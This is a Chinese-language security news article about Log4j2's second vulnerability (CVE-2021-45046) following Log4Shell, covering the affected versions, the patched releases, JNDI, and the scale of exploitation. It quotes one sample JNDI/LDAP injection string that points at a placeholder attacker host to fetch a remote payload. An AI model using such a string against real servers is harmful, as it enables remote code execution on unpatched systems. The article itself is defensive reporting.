网易首页 > 网易号 > 正文 申请入驻

Apache Log4j2漏洞第二弹,Log4Shell漏洞持续影响全球网络

0
分享至

最近披露的重大安全漏洞Log4Shell漏洞发布安全补丁修复后,第二个漏洞很快被爆出,第二个漏洞号为CVE-2021-45046,CVSS评分为 3.7 分,并影响从 2.0-beta9 到 2.12.1 和 2.13.0 到 2.15.0 的所有 Log4j 版本。

根据最近的安全研究,对于CVE-2021-44228漏洞补丁的不够完善的修复,导致修复后更有可能被利用,通过恶意输入数据JNDI导致拒绝服务(DoS)攻击,Log4j 的最新版本 2.16.0(适用于需要 Java 8 或更高版本的用户)几乎取消了对消息查找的支持,并默认禁用了 JNDI,这是漏洞的核心组件。建议需要 Java 7 的用户在可用时升级到 Log4j 版本 2.12.2。

安全研究人员称,处理 CVE-2021-44228 表明 JNDI 存在严重的安全问题,虽然我们已经缓解了我
们所知道的情况,但默认情况下用户完全禁用它会更安全,特别是因为大多数人不太可能使用它。

根据网络安全行业门户「极牛网」GEEKNB.COM的梳理,JNDI 是 Java Naming and Directory Interface 的缩写,是一种 Java API,它使以编程语言编码的应用程序能够查找数据和资源,例如LDAP服务器。Log4Shell 驻留在 Log4j 库中,Log4j 库是一个开源的、基于 Java 的日志记录框架,通常并入 Apache Web 服务器。

当利用 LDAP 连接器的 JNDI 组件注入恶意 LDAP 请求(例如“${jndi:ldap://attacker_controled_website/payload_to_be_executed}”)时,此时登录运行易受攻击版本的 Web 服务器,就会调用存在漏洞的库,使黑客能够从远程检索有效负载并在本地执行。

与其他涉及某些部分软件的主要网络攻击不同,Log4j 基本上嵌入在每个基于 Java 的产品或 Web 服务中,手动修复它非常困难,由于修补的复杂性和易于利用的漏洞,除非公司和服务立即采取行动,通过实施保护措施来防止对其产品的攻击,否则这个漏洞可能将在未来几年内一直存在。

在漏洞披露后的几天里,至少有10 个不同的黑客团伙加入了漏洞利用潮,全球大约 44% 的企业网络已经受到攻击。远程代码执行漏洞的大规模武器化促使美国网络安全和基础设施安全局 (CISA) 将 Log4Shell 添加到其已知被利用漏洞目录中。

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
晚宴上,坐在库克和马斯克中间的女子叫周群飞!传奇经历引发瞩目

晚宴上,坐在库克和马斯克中间的女子叫周群飞!传奇经历引发瞩目

火山詩话
2026-05-15 13:40:37
彭加木被找到了,知情人:DNA专家说99%是彭加木,但有个遗憾

彭加木被找到了,知情人:DNA专家说99%是彭加木,但有个遗憾

抽象派大师
2026-05-15 00:56:40
日本公布世界杯26人名单:留洋23将 39岁传奇入选 三笘薫因伤无缘

日本公布世界杯26人名单:留洋23将 39岁传奇入选 三笘薫因伤无缘

我爱英超
2026-05-15 13:29:38
90后新婚夫妻同患罕见病,丈夫发声:“养仓鼠致病”说法不实

90后新婚夫妻同患罕见病,丈夫发声:“养仓鼠致病”说法不实

大风新闻
2026-05-15 12:00:25
一张照片刷屏了,坐在马斯克和库克中间的中国女人,凭啥这么牛?

一张照片刷屏了,坐在马斯克和库克中间的中国女人,凭啥这么牛?

小陆搞笑日常
2026-05-15 11:44:30
马斯克深夜用中文发帖,全世界都懵了!外媒他到底想干什么?

马斯克深夜用中文发帖,全世界都懵了!外媒他到底想干什么?

侃故事的阿庆
2026-05-15 10:22:08
没上专机的库克,提前到了北京

没上专机的库克,提前到了北京

中国新闻周刊
2026-05-15 12:05:54
特朗普访华欢迎晚宴:9位中国企业家亮相,每一位都是深意所在

特朗普访华欢迎晚宴:9位中国企业家亮相,每一位都是深意所在

寒律
2026-05-15 04:28:47
再度访华的特朗普又一次被三军仪仗队圈粉

再度访华的特朗普又一次被三军仪仗队圈粉

看看新闻Knews
2026-05-15 00:20:02
河南现金王崔培军翻车?司机一句大实话,撕开网红企业家的遮羞布

河南现金王崔培军翻车?司机一句大实话,撕开网红企业家的遮羞布

青梅侃史啊
2026-05-15 11:28:59
特朗普竟被中国菜拿捏?弃汉堡狂炫这两道,老外彻底服气

特朗普竟被中国菜拿捏?弃汉堡狂炫这两道,老外彻底服气

阿凯销售场
2026-05-15 07:04:40
特朗普43岁小儿媳穿旗袍赴宴,华裔设计师作品,前私教自认普通

特朗普43岁小儿媳穿旗袍赴宴,华裔设计师作品,前私教自认普通

译言
2026-05-15 12:26:05
性,已成为职场流通的硬资源!

性,已成为职场流通的硬资源!

灯锦年
2026-05-14 00:10:06
熔断!韩国股市暴跌!

熔断!韩国股市暴跌!

证券时报
2026-05-15 14:12:17
1.1亿美元拿下,世界杯离不开中国!央视获得2026世界杯版权!

1.1亿美元拿下,世界杯离不开中国!央视获得2026世界杯版权!

海浪星体育
2026-05-15 14:50:47
13年后雷军合影马斯克,全网沸腾

13年后雷军合影马斯克,全网沸腾

新浪财经
2026-05-15 00:49:53
中美会谈成果

中美会谈成果

修明札记
2026-05-15 09:56:37
央视或已获得2026年世界杯版权

央视或已获得2026年世界杯版权

五星体育
2026-05-15 14:23:51
黄仁勋逛南锣鼓巷,手拿蜜雪冰城、还喝豆汁

黄仁勋逛南锣鼓巷,手拿蜜雪冰城、还喝豆汁

鞭牛士
2026-05-15 14:37:05
中美会谈已结束,特朗普专机已离京,黄仁勋说了一句不寻常的话

中美会谈已结束,特朗普专机已离京,黄仁勋说了一句不寻常的话

麓谷隐士
2026-05-15 10:16:15
2026-05-15 16:03:00
极牛网
极牛网
极牛网,网络安全行业门户!
256文章数 348关注度
往期回顾 全部

科技要闻

两年联姻一地鸡毛,传苹果OpenAI濒临决裂

头条要闻

女游客以1分钱拍下标价1980元的三亚海景房 酒店回应

头条要闻

女游客以1分钱拍下标价1980元的三亚海景房 酒店回应

体育要闻

德约科维奇买的球队,从第6级联赛升入法甲

娱乐要闻

方媛为何要来《桃花坞6》没苦硬吃?

财经要闻

特朗普的北京时刻

汽车要闻

双零重力座椅/AI智能体/调光天幕 启境GT7内饰发布

态度原创

本地
房产
教育
健康
公开课

本地新闻

用苏绣的方式,打开江西婺源

房产要闻

海南楼市新政要出!拟调公积金贷款额度,最高可贷168万!

教育要闻

新华读报|抛绣球、游泳进中考,体育改革让学生“玩有所得”

专家揭秘干细胞回输的安全风险

公开课

李玫瑾:为什么性格比能力更重要?

无障碍浏览 进入关怀版